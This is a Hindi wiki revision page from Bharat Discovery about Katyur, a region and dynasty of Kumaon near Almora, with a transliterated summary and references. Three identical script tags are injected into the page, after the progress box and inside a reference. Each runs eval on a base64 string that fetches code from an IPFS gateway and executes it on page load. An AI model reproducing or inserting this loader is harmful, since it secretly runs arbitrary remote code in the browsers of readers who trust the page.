Difference between revisions of "कत्यूर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('कत्यूर कुमायूं (उ. प्र.) का एक भाग जिसे कतूरिया भी क...' के साथ नया पृष्ठ बनाया)
 
 
(One intermediate revision by one other user not shown)
Line 1: Line 1:
कत्यूर [[कुमायूं]] (उ. प्र.) का एक भाग जिसे कतूरिया भी कहते हैं। इसमें जिला [[अल्मोड़ा]] और निकटवर्ती प्रदेश शामिल हैं। कत्यूर मूलतः एक वंश का नाम था, जिसका अल्मोड़े के प्रदेश पर बहुत दिनों  तक राज्य रहा था(दे. अल्मोड़ा)। कत्यूर सम्भवतः कर्तृपुर का बिगड़ा हुआ रूप है। [[पाणिनि]] ने कत्रि नामक स्थान का [[अष्टाध्यायी]] 4,2,95 में उल्लेख किया है जो शायद कत्यूर या कर्तृपुर ही है |<ref><ref>{{पुस्तक संदर्भ |पुस्तक का नाम=ऐतिहासिक स्थानावली|लेखक=विजयेन्द्र कुमार माथुर|अनुवादक= |आलोचक= |प्रकाशक=राजस्थान हिन्दी ग्रंथ अकादमी, जयपुर|संकलन= भारत डिस्कवरी पुस्तकालय|संपादन= |पृष्ठ संख्या=04|url=}}</ref></ref>
+
'''कत्यूर''' [[कुमायूं]], [[उत्तराखण्ड]] का एक भाग है, जिसे 'कतूरिया' भी कहते हैं। इसमें ज़िला [[अल्मोड़ा]] और निकटवर्ती प्रदेश शामिल हैं।
  
 +
*कत्यूर मूलतः एक वंश का नाम था, जिसका अल्मोड़ा के प्रदेश पर बहुत दिनों तक राज्य रहा था।
 +
*सम्भवतः कत्यूर कर्तृपुर का बिगड़ा हुआ रूप है।
 +
*[[पाणिनि]] ने 'कत्रि' नामक स्थान का '[[अष्टाध्यायी]]'<ref>अष्टाध्यायी 4,2,95</ref> में उल्लेख किया है, जो शायद 'कत्यूर' या 'कर्तृपुर' ही है।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=ऐतिहासिक स्थानावली|लेखक=विजयेन्द्र कुमार माथुर|अनुवादक= |आलोचक= |प्रकाशक=राजस्थान हिन्दी ग्रंथ अकादमी, जयपुर|संकलन= भारत डिस्कवरी पुस्तकालय|संपादन= |पृष्ठ संख्या=04|url=}}</ref>
 +
 +
 +
{{लेख प्रगति|आधार=|प्रारम्भिक= प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
 +
==टीका टिप्पणी और संदर्भ==
 +
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==
{{उत्तर प्रदेश के ऐतिहासिक स्थान}}
+
{{उत्तराखण्ड के ऐतिहासिक स्थान}}
[[category:ऐतिहासिक स्थानावली]][[category:पौराणिक स्थान]][[Category:उत्तर प्रदेश के ऐतिहासिक स्थान]][[Category:ऐतिहासिक स्थान कोश]]
+
[[category:उत्तराखंड]][[category:उत्तराखंड के ऐतिहासिक स्थान]][[Category:उत्तराखंड का इतिहास]][[Category:ऐतिहासिक स्थान कोश]][[Category:ऐतिहासिक स्थानावली]]
 
__INDEX__
 
__INDEX__

Latest revision as of 11:55, 22 July 2018

katyoor kumayooan, uttarakhand ka ek bhag hai, jise 'katooriya' bhi kahate haian. isamean zila almo da aur nikatavarti pradesh shamil haian.

  • katyoor moolatah ek vansh ka nam tha, jisaka almo da ke pradesh par bahut dinoan tak rajy raha tha.
  • sambhavatah katyoor kartripur ka big da hua roop hai.
  • panini ne 'katri' namak sthan ka 'ashtadhyayi'[1] mean ullekh kiya hai, jo shayad 'katyoor' ya 'kartripur' hi hai.[2]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. ashtadhyayi 4,2,95
  2. aitihasik sthanavali |lekhak: vijayendr kumar mathur |prakashak: rajasthan hindi granth akadami, jayapur |sankalan: bharat diskavari pustakalay |prishth sankhya: 04 | <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh